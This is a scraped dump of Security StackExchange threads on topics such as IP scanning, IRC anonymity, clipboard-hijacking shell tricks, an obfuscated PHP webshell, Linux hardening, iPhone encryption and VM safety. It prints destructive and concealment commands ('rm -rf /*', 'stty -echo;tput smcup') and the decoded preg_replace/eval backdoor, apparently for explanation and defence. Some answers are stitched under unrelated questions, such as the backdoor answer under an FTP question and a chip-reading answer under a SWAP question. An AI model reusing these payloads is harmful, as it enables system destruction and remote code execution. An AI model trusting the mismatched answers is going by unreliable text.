scanIpAddress("104.16." + j + "." + i); . This will allow them to scan 104.16.1-255.1-255 . From there, they can keep going backwards and nesting for loops until they get the entire internet. There are other, more efficient ways to do this, such as masscan, but this is the most basic way. Again, this could also be done on the command line with one line: for oct1 in `seq 1 255`; do for oct2 in `seq 1 255`; do for oct3 in `seq 1 255`; do for oct4 in `seq 1 255`; do scan $oct1.$oct2.$oct3.$oct4 --stuff; done; done; done; done Other methods The above example was a really rough example. They may be doing more, their code might be different, and they may be using entirely different methods and/or programs. However, the concept is pretty much the same. It's also possible that the programs in question are just targeting everyone en masse. So how can I hide my stuff online? If it's online, whatever you are hiding, they will find it... or try to find it. However, depending on your web server, you can try http access controls such as .htaccess . If you're using access controls - again, this depends on your web server - then it's likely that you'll be able to prevent others from viewing/accessing pages. That won't protect you against non-website login attempts, though. And if you're denying them access to non-existent webpages, they now know you're really online, and can focus their attacks more easily! However, it's still good practice. Here's an example .htaccess deny for Apache (2.4 and later): Require ip 192.168.1.100 In the above example, you're denying everyone access to that folder, except your IP address. Keep in mind, 192.168.1.100 is a local IP address. You'll have to replace that with your public IP address. Also, keep in mind that if your attacker is running a proxy/VPN on your machine, they can still access those pages. If your attacker already has access to the website, they can either edit the .htaccess or remove it. Nothing's 100%. Just don't put anything online if you aren't ready to be scanned. Everyone has a plan until they get port-scanned in the mouth.
{ "source": [ "https://security.stackexchange.com/questions/113456", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90321/" ] }
113,532
What is so special about IRC that hackers use it to do online meetings, ignoring every other option, like messengers or social media? It seems to be very secure that it gets used to send commands to victim's computers instead of just sending them directly (called a "botnet", right?)
In addition to Rory's points... Internet Relay Chat is actually incredibly insecure I don't think IRC is in any way secure by default. Almost all servers utilize communication through plaintext. Your ISP can snoop on the contents easily. All of your messages, in general, are unencrypted. You have to install addons to enable encrypted communications, if they're even done right. Even if the server itself encrypted the messages/uses SSL, it's a moot point: everyone can connect and read what you're saying unless you encrypted it on your end. IRC admins can read your private messages as well. The vast majority of servers I've visited also expose your IP Address to everyone unless you're behind a proxy or VPN, so there's no real anonymity. Even the ones that partially mask your IP will show part of where you are. For example: Random432342.hsd1.ca.comcast.net . While other servers will block everything, all IRCops/admins know the real IP you're connecting from. What's to stop them from cooperating with law enforcement? Your IRC client could also be vulnerable to buffer overflow attacks / string formatting vulnerabilities / etc. Or maybe you'll just click on a drive-by-download link... Does true anonymity exist on IRC? Some people have a different definition of anonymity than me. Rory's definition is correct in the context of being anonymous to most people , but that's not the definition I subscribe to. For me, anonymity is being anonymous to everyone , no matter what. How do you think people keep getting busted even though they're "behind 7 proxies" ? If you're behind a proxy/vpn, you're still communicating with the IRC server. Your proxy/VPN is connected to that IRC server, and you are connected to that proxy/vpn server at a specific time . Once you send text, whether it's encrypted or not, all law enforcement really needs to do is line up timestamps, even if it's encrypted. Lag delay? Yeah, that's very easy to account for. Soon, a very clear pattern will emerge, and your entire proxy/VPN chain will be quickly unraveled to the source. How can they do that? XKeyscore , Prism . Right now, true anonymity doesn't really exist on IRC. But Mark Buffalo, I've never been caught! They either don't care about you because you're a small fry who doesn't matter, or they're slowly building up a case to get you on maximum charges. Or you're simply out of their jurisdiction, but they're still ready to pounce. Maybe this "security" is actually a jurisdiction issue? I think part of the confusion here is jurisdiction. Jurisdiction can offer tremendous security if there's a refusal to co-operate. This is why many criminals may still be around after "getting caught." If you're in another country which refuses to cooperate with the law enforcement of another country, you might be safe from prosecution, but you'll probably still be indicted on charges . So as long as you never enter that country...
{ "source": [ "https://security.stackexchange.com/questions/113532", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31356/" ] }
113,627
Like all beginners in the land of Linux, I usually look for websites that contain some useful shell commands, mark it with my mouse, copy it ( CTRL + C ) and paste it into a terminal. For example, if I need to install package_name.deb sudo apt-get install package_name.deb I will give my root password and install the package_name.deb When I paste this command to my text editor , it will be something like: sudo apt-get install package_name.deb && apt-get install suspicious_file.deb Second example, if I want to add a new ppa (terminal) sudo add-apt-repository ppa:some/ppa sudo apt-get update When I edit my sources.list, I will find something like: deb http://ppa.launchpad.net/some-ppa/ and deb http://ppa.launchpad.net/a_suspicious_some-ppa/ The problem is the second ppa deb http://ppa.launchpad.net/a_suspicious_some-ppa/ is added automatically and without my permission. As you can see, there is an invisible part. It does not appear on my terminal. What is the risk of copy and paste from an untrusted website in the terminal and how to fix my operating system?
Websites can append to your clipboard The risk is exactly what you said it was. It's definitely possible to append malicious commands to the clipboard. You could even append && rm -rf /* (only executes if the first command was successful), or ; rm -rf /* (executes even if the first command was unsuccessful) and brick certain UEFI devices . You should also check out Michael's post in this thread for another example . In the end, it really depends on how creative and malicious a particular evil "hacker" is. But how can you make the commands "invisible" in the terminal?" Method one echo test;echo insert evil here;clear;echo installing package Execution order : Echo "test" happens Echo "insert evil here" happens Actions are "cleared" Intended action happens here, but you don't see the rest. ... You can try to scroll up in the terminal window to find the rest of it. Method two stty -echo tput smcup This will disable the terminal from showing what you're typing, so it doesn't appear in the terminal window at all. You can try it like this: stty -echo;tput smcup;echo evil commands expected command Those are just two really rough examples, but show the potential of what can be done to obfuscate commands. Note that it likely doesn't hide from ~/.bash_history unless the hidden commands specifically delete/modify it's contents. You should assume that there are other ways to do this. Mitigation I recommend using an addon to disable clipboard manipulation . There are unfortunately ways to get around that, so I'd recommend pasting everything into a GUI text editor before it goes into your terminal , or anywhere. You need to verify what you're doing. If you don't understand each individual command, you should google it. This is proper tinfoil hattery because copy and pasting can force the commands to auto-execute on many Linux flavors. Repairing your Linux installation You might not have any idea how deep the rabbit hole goes. Unless you have the time and effort to put into it, I'd suggest you just nuke from orbit, unless you have important files. If you have important files, just back up the non-executable stuff (no pdfs, documents, etc), and then nuke from orbit. If you have PDFs, you can convert the PDF to post-script, or copy and paste the contents into a text file. With documents, copy and paste the text and format it later.
{ "source": [ "https://security.stackexchange.com/questions/113627", "https://security.stackexchange.com", "https://security.stackexchange.com/users/98440/" ] }
114,633
I recently started server-side programming, and wrote up a page containing a drawable-canvas that lets users publically draw and save a picture, and overwrite pictures made by others. For kicks, I thought of advertising the link on social media to see what happens. I'd rather not put my computer in harm's way though just for kicks. My main concerns are someone being able to access the rest of my system, or being able to delete files off the site. Are either of these a concern? Quick information about the setup: I'm using XAMPP 7.0.1 on Windows 10 Home. Besides putting a password on my MySQL server, I really haven't done anything security oriented, so it could be considered in an "out-of-the-box" state as far as security is concerned. It uses a MySQL database and PHP's MySQLi library, but as mentioned above, I have it password protected, and have taken care to prevent injection.
Oh my. YES! All those things are of a concern. You only expose your server publicly if you are prepared to have that server taken over by a malicious party. All one needs to do is to find a misconfiguration or a security hole and they can own your personal computer that you use to do things like access personal accounts (email, banks, etc.). Public servers need to be locked down, with only the info it needs to provide a service. Best case is to have that server backed up and disposable in case it is compromised. If something bad happens, you blow it away and restore from back ups. Do not expose your personal computer to the public in this way, especially when you are exposing custom code and you do not understand how exploitable it is.
{ "source": [ "https://security.stackexchange.com/questions/114633", "https://security.stackexchange.com", "https://security.stackexchange.com/users/82973/" ] }
114,721
This page on server hardening claims: Disabling the root account is necessary for security reasons. Why is disabling the root account necessary for security reasons?
If you're not using Root, you're using sudo! Sudo is a great way to become root only when you need to. Root is a giant target. What's root's username? Root! I'm so smart :) Logging. Sudo has a greater command of audit logging (so that when someone uses sudo to do something silly, you can tattle on them to the central logging server). This is helpful for forensic analysis in some cases. Granular permissions. Root is a Big Flippin' Hammer. Do not hand BFHs to your users. Sudo allows you to specify that a user can run update commands like aptitude without password, but everything is off limits! You can't do that with the BFH that is root. IT allows you the flexibility of sanctioning certain commands for users, but disallowing others. This allows you to build a security policy that does not require an administrator to physically log in to a machine every time a machine needs to be updated (or another menial task). Idiot-proofing. Why do you not hand users a BFH? Because they're dumb. Why do I use sudo instead of root? I'm dumb. Dumb means mistakes, and mistakes mean security holes and sysadmin-issues.
{ "source": [ "https://security.stackexchange.com/questions/114721", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11902/" ] }
114,762
There are many open Wi-Fi hotspots scattered around from cafes to airports. I understand that a non-passworded Wi-Fi leaves traffic unencrypted and therefore available for hackers to read. I also know about a man-in-the-middle attack where the Wi-Fi hotspot is malicious. I therefore always use a VPN connection to encrypt my traffic while using open Wi-Fi hotspots to avoid these attacks. But the article Even with a VPN, open Wi-Fi exposes users states that even with a VPN connection, an open Wi-Fi hotspot is still insecure. It states: In this period before your VPN takes over, what might be exposed depends on what software you run. Do you use a POP3 or IMAP e-mail client? If they check automatically, that traffic is out in the clear for all to see, including potentially the login credentials. Other programs, like instant messaging client, may try to log on. But at the same time the article feels like a disguised advert concluding with (what feels like) a sales pitch for something called Passpoint which I have never heard of: The Wi-Fi Alliance has had a solution for this problem nearly in place for years, called Passpoint . Can an open Wi-Fi hotspot be considered secure when using a VPN connection or should you NEVER use open hotspots?
This is actually exactly the type of environment VPNs were designed to work in: when you cannot trust the local network. If set up properly (i.e. making sure all traffic goes through the VPN and using a secure mutual authentication scheme) it will pretty well protect your connection. This, however, requires the whole thing to be designed properly. Obviously, your VPN must be set up so that ALL your communication goes through the encrypted channel, not just the part that is aimed at the internal network behind it (which is sometimes the case with corporate firewalls or if you're using SSH). Avoid using SSL VPN unless you're using a pinned certificate for the server: you'll want to avoid having to perform PKI validation of the server's host name since it can be rather delicate. Understand the limitation: you will not be able to "mask" the fact that you're using a VPN, you will not mask the volume and pattern of your exchange (which can be to some extent used to identify the type of service you're using) and your connection will ONLY be secure up to the VPN exit point: everything between that point and the destination server will not be protected by the VPN (although it can also be encrypted on its own). There is no guarantee against a state actor who would be willing to spend dedicated resources to penetrate your security.
{ "source": [ "https://security.stackexchange.com/questions/114762", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87457/" ] }
114,897
Apple released an open letter to the public outlining their reasons for not complying with the FBI's demands to modify the iPhone's security mechanism. Here's a summary: The FBI has an iPhone in their possession which they would like to access data from. The phone is locked and fully encrypted. After failing to get into the phone, the FBI asked Apple to unlock the phone. Apple said since the phone is encrypted, they can't get into it either. The FBI asked Apple to modify the iPhone OS to enable brute force password attempts electronically. (Currently the passwords can only be entered in via the manual interface, and is limited to 10 attempts.) Apple refused. They believe it would be too dangerous to make that change because in the wrong hands it would undermine the security of all iPhone users, even if they only used the software in this instance. I understand Apple's position of not wanting to make the change, particularly for new phones, but it's unclear whether the change could actually be made and installed on an existing locked and encrypted phone. Could they actually accomplish this for an existing encrypted phone? If yes, then isn't simply knowing this is possible also undermining the security? It seems to me it would be just one step removed from the backdoor they are trying to keep closed. Update : since this is a security forum, I feel it is important to point out that Apple is using the word backdoor differently than we typically do on this site. What the FBI has asked Apple to do would not result in a backdoor by the typical definition that we use, which is something akin to a master key. Instead, in this case, if Apple were to comply, the FBI would then be able to attempt to brute force the passcode on the phone. The strength of the passcode would determine whether they are successful in gaining access. Based on Dan Guido's article (linked to in Matthew's answer), if each passcode try takes 80ms, then the time needed to brute force the passcode would take, on average (by my calculations): 4 digit numerical passcode: about 7 minutes 6 digit numerical passcode: about 11 hours 6 character case-sensitive alphanumerical passcode: 72 years 10 character case-sensitive alphanumerical passcode: 1 billion years Obviously if a 4 or 6 digit numerical passcode was used, then the brute force method is basically guaranteed to succeed, which would be similar to a backdoor . But if a hard passcode is used, then the method should probably be called something other than a backdoor since gaining access is not guaranteed, or even likely. Update 2 : Some experts have suggested that it is theoretically possible for the FBI to use special tools to extract the device ID from the phone. Having that plus some determination and it should be possible to brute force the pin of the phone offline without Apple's assistance. Whether this is practically possible without destroying the phone remains to be seen, but it is interesting to note that if it can be done, the numbers I mentioned in the above update become meaningless since offline tools could test passcodes much faster than 80ms per try. I do believe that simply knowing this is possible, or even knowing that Apple can install new firmware to brute force the passcode more quickly, does imply a slightly lessened sense of security for all users. I believe this to be true whether Apple chooses to comply with the order or not. There are multiple excellent answers here, and it's very difficult to choose which one is best, but alas, there can be only one. Update 3 : It appears that the passcode to unlock the phone was in fact simply a 4 digit code . I find this interesting because this means the FBI asked Apple to do more than was necessary. They could have simply asked Apple to disable the wipe feature and timing delay after an incorrect attempt. With only those 2 changes one could manually attempt all 10,000 possible 4 digit codes in under 14 hours (at 5 seconds per attempt). The fact that the FBI also demanded that Apple allow them to brute force electronically seems odd to me, when they knew they didn't need it. Update 4 : It turns out the FBI was able to unlock the phone without Apple's help, and because of this they dropped their case against Apple. IMO, overall this is bad news for Apple because it means that their security (at least on that type of phone) was not as strong as previously thought. Now the FBI has offered to help local law enforcement unlock other iPhones too.
Various commentators suggest that this would be possible, on the specific hardware involved in this case. For example, Dan Guido from Trail of Bits mentions that with the correct firmware signatures, it would be possible to overwrite the firmware, even without the passcode. From there, it would be possible to attempt brute force attacks against the passcode to decrypt the data. It appears to not be possible if the firmware replacement is incorrectly signed, and the signing keys have been kept secure by Apple so far. He also mentions that this wouldn't be possible on some later devices, where the passcode check is implemented in a separate hardware module, which enforces time delays between attempts. Edit Feb 2017 : Cellebrite (a data forensics company) have announced the capability to unlock and extract data from most iPhones from the 4S to the 6+ , strongly suggesting that a flaw exists somewhere, which they are able to exploit. They haven't released full details of this.
{ "source": [ "https://security.stackexchange.com/questions/114897", "https://security.stackexchange.com", "https://security.stackexchange.com/users/47578/" ] }
114,919
I just noticed that the top line of my index.php file got changed to what's below. <?php preg_replace("\xf4\x30\41\x1f\x16\351\x42\x45"^"\xd7\30\xf\64\77\312\53\40","\373\x49\145\xa9\372\xc0\x72\331\307\320\175\237\xb4\123\51\x6c\x69\x6d\x72\302\xe1\117\x67\x86\44\xc7\217\x64\260\x31\x78\x99\x9c\200\x4"^"\273\40\13\312\x96\265\x16\xbc\x98\xbf\x13\374\xd1\x7b\x4b\15\32\x8\104\xf6\xbe\53\2\345\113\xa3\352\114\x92\155\111\xbb\xb5\251\77","\206\65\x30\x2f\160\x2\77\x56\x25\x9a\xf\x6\xec\317\xeb\x10\x86\x0\244\364\255\x57\x53\xf3\x8d\xb9\13\x5c\2\272\xc5\x97\215\347\372\x83\x74\367\x28\x2e\xd1\x36\x72\177\223\x3c\xb2\x1a\x96\271\127\x3b\337\xcf\277\317\xb7\4\214\271\xb2\235\71\xa6\x3d\205\325\127\336\70\xd6\x7c"^"\312\7\x58\131\x12\x55\152\146\151\250\76\166\210\207\x9b\x22\xdf\127\xcc\x9e\xe1\144\x11\302\324\324\x73\x2c\133\213\374\xf8\xe9\240\313\xf0\x38\305\x6e\x54\xb2\4\x24\x4f\360\105\213\152\xf4\xee\64\x4d\275\x88\206\xa1\325\x35\265\xc3\xd0\xca\177\xd5\x5f\xc6\xe0\40\274\x55\xb5\x41"); ?> This looks very suspicious to me, and I know generally what preg_replace does. However, I don't know how to decode the subject, pattern, or replacement strings. Can anyone tell me What this code actually will do? How it's possible that a supposedly locked PHP file can get updated on the server?
What will this code actually will do? You have a backdoor that allows Remote Code Execution Credit to borjab for the inital decode <?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?> Note this base64 encoded string we found in the first file: L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc When decoding that string, it points to this file: /home4/mitzvahc/public_html/assets/img/logo_small.png The "image" file is not what it seems to be. kayge pointed out that the file is obviously accessible online. So I downloaded your "image", which is where the real hack is happening. The first script is trying to load the content's of that image. Inside the pretend image, there are two eval() statements which allow full arbitrary code execution when checking $GLOBALS[ooooOOOOo(0)] . This only happens if the attacker attempts to set that variable. 99% of the time when you see eval() , all you really need to know is that your entire web server is compromised by remote code execution. Here's what it's doing: eval(gzuncompress(base64_decode("evil_payload"))); Of course, you were already compromised through some form of exploit , but this gives the attacker an obfuscated backdoor into your web server that they can continually access, even if you were to patch the problem allowing them to write files in the first place. What are the evil gunzip contents? You can see them here . Inside the above, here's another encoding dump (Thanks, Technik Empire ) Technik Empire just greatly contributed to the deobfuscation of the contents in #2 . nneonneo cleaned it up even more . Why is this happening? How it's possible that a supposedly locked PHP file can get updated on the server? This is too broad to answer without having access to everything. You may have incorrect hardening on your Content Management System installation, or there may be a vulnerability somewhere in your web stack. I don't care to visit your website considering what's going on, so you can check these links if they're part of your CMS: Joomla Security Checklist WordPress Hardening Django Deployment Checklist If your CMS isn't listed, look for hardening/security checklists for your CMS installation. If you are not using a CMS, but rather your own code, then it's on you to fix your security holes. There could be any number of reasons why this is happening... but the bottom line is: either your web host has been hacked, or you have an exploit on your website which allows malicious individuals to insert additional code and give them full control over your website... meanwhile, they are attacking your visitors .
{ "source": [ "https://security.stackexchange.com/questions/114919", "https://security.stackexchange.com", "https://security.stackexchange.com/users/101591/" ] }
114,933
I currently have a Windows 2012 Server which is acting as a webserver running IIS. I am using Filezilla to host an FTP server to allow some clients FTP access to their own websites. I have setup the FTP account with ease and they are able to access their website folder. However I really wish to explore this further and actually make this secure. At the moment there is nothing stopping them uploading .exe file and run on the website, to hack my server. How can I limit the files they upload to just a few desired extensions such as PHP, JS as well as disabling renaming of entities (to stop them changing back the extention to .exe as an example). Additionally, are there any other security measures I could take? Please tell me if I missed any information. Please do not reply with comments such as "If you don't trust them, dont give access" as this is off topic
What will this code actually will do? You have a backdoor that allows Remote Code Execution Credit to borjab for the inital decode <?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?> Note this base64 encoded string we found in the first file: L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc When decoding that string, it points to this file: /home4/mitzvahc/public_html/assets/img/logo_small.png The "image" file is not what it seems to be. kayge pointed out that the file is obviously accessible online. So I downloaded your "image", which is where the real hack is happening. The first script is trying to load the content's of that image. Inside the pretend image, there are two eval() statements which allow full arbitrary code execution when checking $GLOBALS[ooooOOOOo(0)] . This only happens if the attacker attempts to set that variable. 99% of the time when you see eval() , all you really need to know is that your entire web server is compromised by remote code execution. Here's what it's doing: eval(gzuncompress(base64_decode("evil_payload"))); Of course, you were already compromised through some form of exploit , but this gives the attacker an obfuscated backdoor into your web server that they can continually access, even if you were to patch the problem allowing them to write files in the first place. What are the evil gunzip contents? You can see them here . Inside the above, here's another encoding dump (Thanks, Technik Empire ) Technik Empire just greatly contributed to the deobfuscation of the contents in #2 . nneonneo cleaned it up even more . Why is this happening? How it's possible that a supposedly locked PHP file can get updated on the server? This is too broad to answer without having access to everything. You may have incorrect hardening on your Content Management System installation, or there may be a vulnerability somewhere in your web stack. I don't care to visit your website considering what's going on, so you can check these links if they're part of your CMS: Joomla Security Checklist WordPress Hardening Django Deployment Checklist If your CMS isn't listed, look for hardening/security checklists for your CMS installation. If you are not using a CMS, but rather your own code, then it's on you to fix your security holes. There could be any number of reasons why this is happening... but the bottom line is: either your web host has been hacked, or you have an exploit on your website which allows malicious individuals to insert additional code and give them full control over your website... meanwhile, they are attacking your visitors .
{ "source": [ "https://security.stackexchange.com/questions/114933", "https://security.stackexchange.com", "https://security.stackexchange.com/users/101600/" ] }
115,021
My website pages reference some JavaScript code from a third-party CDN (analytics, etc). So I don't control what code is there - the third party may change those scripts at any moment and introduce something bad into those scripts - maybe accidentally, maybe deliberately. Once those scripts are changed, the users start receiving and running new code in their browsers. What risks are raised by this uncontrolled code? What's the worst thing that can happen? How do I get started with managing the risk?
Risk In the worst scenario, it could render website completely inaccessible for the users, it could perform particular actions as them (for example, requesting account removal, spending money) or it could steal confidential data. Prevention Can't be done. If you run someone else's JavaScript on your website, it becomes no more secure than that third-party. You have to host it yourself. You can get closer to the target, however. One thing may be Content Security Policy . The example setting of header Content-Security-Policy to script-src 'self' www.google-analytics.com; , would prevent execution of scripts served from other domains than your own or www.google-analytics.com . That way if someone would find some cross-site scripting vulnerability (XSS) that would allow them to add their own inline JavaScript code to your website - it would not run. Other really cool thing is so called Subresource Integrity . It's essentially adding hash sum of JS you expect to run to the integrity parameter you give to the script tag. <script src="https://example.com/example-framework.js" integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC" crossorigin="anonymous"/> You can generate those hashes online at https://www.srihash.org/ or with command: openssl dgst -sha384 -binary FILENAME.js | openssl base64 -A This of course has downsides, e.g. analytics providers may change their scripts and you will have to change integrity parameter to keep them running. It's also pretty new feature (Chrome 45.0+, Firefox 43+, Opera 32+, no IE, Edge or Safari support at the moment), so you lay your client's security on their own software. See also 3rd Party Javascript Management Cheat Sheet from OWASP.
{ "source": [ "https://security.stackexchange.com/questions/115021", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2052/" ] }
115,044
As far as I understand, the 4 digit passcode is combined (in some fashion) with a key stored in secure read only memory (e.g. secure enclave chip or similar), where it is directly embedded into silicon wiring to help prevent unauthorized reads. But no matter how strong or multi-layered or complicated the security is, wouldn't it still be possible to read the key directly from the silicon wiring of the secure chip or ROM, using some electron microscopy technique or similar? If so, surely the FBI could develop the technology for this, without asking Apple for help.
Yes, it is possible. However, that runs the risk of destroying the device without getting the data off first, which is undesirable. It also does not achieve the political goals of forcing Apple to assist in decrypting the device, paving the way with precedent for the flurry of future requests of this sort to come, some of which are certain to have less favorable facts and thus are not as suitable as test cases.
{ "source": [ "https://security.stackexchange.com/questions/115044", "https://security.stackexchange.com", "https://security.stackexchange.com/users/101741/" ] }
115,048
This page on server hardening has a large section on adding a SWAP partition. Why is adding a SWAP partition good for server hardening?
Yes, it is possible. However, that runs the risk of destroying the device without getting the data off first, which is undesirable. It also does not achieve the political goals of forcing Apple to assist in decrypting the device, paving the way with precedent for the flurry of future requests of this sort to come, some of which are certain to have less favorable facts and thus are not as suitable as test cases.
{ "source": [ "https://security.stackexchange.com/questions/115048", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11902/" ] }
115,269
Summary of the current situation by @TTT Apple released an open letter to the public outlining their reasons for not complying with the FBI's demands to modify the iPhone's security mechanism. Here's a summary: The FBI has an iPhone in their possession which they would like to access data from. The phone is locked and fully encrypted. After failing to get into the phone, the FBI asked Apple to unlock the phone. Apple said since the phone is encrypted, they can't get into it either. The FBI asked Apple to modify the iPhone OS to enable brute force password attempts electronically. (Currently the passwords can only be entered in via the manual interface, and is limited to 10 attempts.) Apple refused. They believe it would be too dangerous to make that change because in the wrong hands it would undermine the security of all iPhone users, even if they only used the software in this instance. My question is, if the cracking takes seven minutes, why not just release the update, wait ten or so minutes (coordinate with the FBI on this) and then release another update rolling back the change.
The whole story is weird. Since the iPhone in question does not have a tamper-resistant device, the FBI should be able to open the case, read the whole Flash chip, and then run the exhaustive search themselves without even running the phone's firmware. Updates from Apple should have no effect at all. ( Edit: in fact it is a bit more complex; see below.) Conversely, assuming that there was a technical impossibility in the description above (which would amount to claim that the FBI's level of incompetence is at least as large as their budget), and that an Apple firmware would solve the case, then it would be easy for Apple to make a firmware version that does the exhaustive search as the FBI wants, but only after having checked that the hardware serial number exactly matches some expected value, i.e. the exact phone from the San Bernardino case. Such a firmware would comply with the exact demand from the FBI without compromising the privacy of anybody else. That the FBI claims to have tried decrypting the phone for one month and failed, is weird. That Apple refuses to help with the decryption with a firmware update limited to a single phone, is equally weird. What the whole thing seems to be is a political struggle about the right to privacy and the legality of non-judicial eavesdropping by law enforcement. The San Bernardino case is merely a pretext that is used to elicit reflex support from non-technical electorate. Apple found it expedient to play the role of the White Knight, from which they cannot now back away without alienating their consumer base. Edit: the security system in an iPhone is a tower of elements, described (succinctly) in this document . An iPhone 5C runs on an Apple A6 chip, which the 5S and later models use an A7. The A6 has an onboard tamper-resistant device called the "UID"; the A7 has a second one called the "Secure Enclave". Since the iPhone in the San Bernardino case is a 5C, I won't talk any more of the Secure Enclave. The UID contains an internal key that is unique to the device (let's call it K u ), and is unknown to anybody else, including Apple (whether the UID generates it itself, or it is generated externally and then injected in the UID on the processing chain, is unknown; I'll assume here that if reality matches the latter case, then Apple really did not keep the key). The UID never let that key out, but it can do an AES-based computation that uses that key. The iPhone data is encrypted with AES, using a 256-bit key ( K d ) that is derived from the combination of the user PIN and the UID key. Though Apple does not exactly detail that combination, it says it involves key wrapping, which is another name for encrypting a key with another key. We also know that a user can change his PIN, and it would be impractical to change the actual data encryption key K d in that case, because it would involve reading, decrypting, re-encrypting and rewriting the gigabytes of user data. Thus, a plausible mechanism is the following: The key K d has been generated once. When the phone is off, what is stored (in Flash, out of the UID) is an encryption of K d by another key K z . K z is itself the encrypting (wrapping) of the user PIN by K u . Thus, the unlocking entails obtaining the user PIN, submitting it to the UID, who returns K z by encrypting the PIN with K u . With K z , the phone's firmware then recovers and decrypts K d , and configures the crypto engine to use that key for all accesses to the user data. While the actual scheme may differ in its details, the general outline must match that description. The salient point are that, although the tamper-resistant device (the UID) must be involved with each PIN try, it does not actually verify the PIN. The UID has no idea whether the PIN was correct or not. The wrong PIN counter, the delay on error, and the automatic deletion, are handled externally, by the firmware. This must be so because otherwise there would be no sense in Apple allowing the break to be performed with a firmware update. Of course, one can imagine a kind of extended UID that would enforce the PIN verification and lock-out strategy, and could do so by running its own firmware that would be updatable by Apple. Such a device would really make Apple's help crucial. However, such a device would then be called a "Secure Enclave" because that's exactly what it is, and if it was added in the A7 CPU, it is precisely because it was lacking in the A6 and that absence was a vulnerability. So what does it mean for a brute-force attack ? This implies that the UID must be invoked for each user PIN try. However, that's the UID -- not the phone's firmware. If you open the iPhone case, then the A6 CPU sub-packaging, the device UID can be accessed by connecting to it directly. It will involve some precision laser-based drilling and an electronic microscope to see what you are doing, so it certainly is not easy -- let's say it will cost a few thousands of dollars because that's the same kind of thing that is done (routinely !) by people who clone and resell satellite-TV access smart cards. Once connected, an external system can submit all possible user PIN for the UID to encrypt them all and provide the corresponding K z keys (in my terminology above). Then the rest is done offline with a PC and a copy of the Flash storage. At no point is the phone's firmware invoked. What the FBI currently asks for is an automatization of the process. They don't want to do precision drilling with lasers. They want to be able to plug something in the iPhone port without having to even open the case, so that the brute-forcing is done by the iPhone's CPU itself and the whole process can be done smoothly. Thus, it is really not about the San Bernardino case. The FBI does not want a one-shot intervention from Apple; what they ask for is a tool that will be usable repeatedly on many phones. Apple is right in claiming that what the FBI asks for exceeds the specific case that serves as emotional pretext. On the other hand, Apple could produce a firmware update that does as the FBI asks for, but only on the specific iPhone (identified through, for instance, the CPU serial number). And that firmware update would be specific to the 5C, and would not work on later models. There is no inevitability in Apple's producing a new firmware leading to a generic cracking tool for all phones of all models. But even if Apple complies with the a firmware that is specific to a single iPhone, the legal precedent will have been established, and Apple would find it hard to refuse other requests, from the FBI or from other countries where Apple has business interests (i.e. all of them). A system which would ensure protection against user PIN cracking would need a tamper-resistant device that not only enforces the PIN failure counter and key erasure, but that device should also run a firmware that is not upgradable. The Secure Enclave has its own firmware, but it can be upgraded (firmware upgrades are signed by Apple, the Secure Enclave hardware verifies the signature). Even on an iPhone 6, Apple retains the ability to unlock arbitrary phones.
{ "source": [ "https://security.stackexchange.com/questions/115269", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83035/" ] }
115,286
I'm running Windows in a virtual machine on my mac (via Parallels). Should I bother installing antivirus, firewall and using other conventional wisdom practices (like don't open unknown .exe etc)? I don't care about data in the virtual machine since I'm using Windows just to run some software which I can't in OSX. So if something goes wrong I can just re-install windows from scratch. Conversely I care about the data I have on my mac and even though I do regular backups it will be really bad if I happen to lose them.
Your virtual Windows is on the same network with your OSX, so the same threats of having an infected device on a network applies to this VM. Your VM is equivalent to a PC in your network its not much different. The same security practices that apply to your PC also applies to your VMs. Although OSX does not run the same malicious apps that run on windows machines, that VM can still be a threat to rest of the devices on the network. It can also consume your machine's resources in case it becomes infected and make your host machine slow too. At times you may login to your email/cloud account on the VM to download something and in case the VM is infected with a keylogger, your data can be stolen. You may connect a USB Flash drive to the VM to transfer files elsewhere and infection can spread this way. Try to keep the guest operating system along with softwares used in it updated at minimum. If you use it moderately get a free antivirus like microsoft's Windows Defender. One other threat is Ransomwares , Parallels Desktop has a feature that shares some of your OSX folders with windows. If your windows VM gets infected with a ransomware, it can possibly encrypt your shared files causing damage to your important data. Looking at Virtualbox's manual chapter 13, Security guide . Other than the points mentioned above plus the clipboard which SilverlightFox mentioned, it says: 13.3.4. Potentially insecure operations Enabling 3D graphics via the Guest Additions exposes the host to additional security risks; see Section 4.5.1, “Hardware 3D acceleration (OpenGL and Direct3D 8/9)”. ... When Page Fusion (see Section 4.9.2, “Page Fusion”) is enabled, it is possible that a side-channel opens up that allows a malicious guest to determine the address space layout (i.e. where DLLs are typically loaded) of one other VM running on the same host. This information leak in it self is harmless, however the malicious guest may use it to optimize attack against that VM via unrelated attack vectors. It is recommended to only enable Page Fusion if you do not think this is a concern in your setup. ... While you're using a different hypervisor, it is imaginable that same type of risks also apply to that.
{ "source": [ "https://security.stackexchange.com/questions/115286", "https://security.stackexchange.com", "https://security.stackexchange.com/users/70846/" ] }
115,331
In video games, most anticheat software is run clientside (e.g. PunkBuster or Valve Anti-Cheat)- but isn't one of the first rules of security to never trust the client? If so, then why do these companies not offer server side verification for video games, but rather continue to insist on trusting the client?
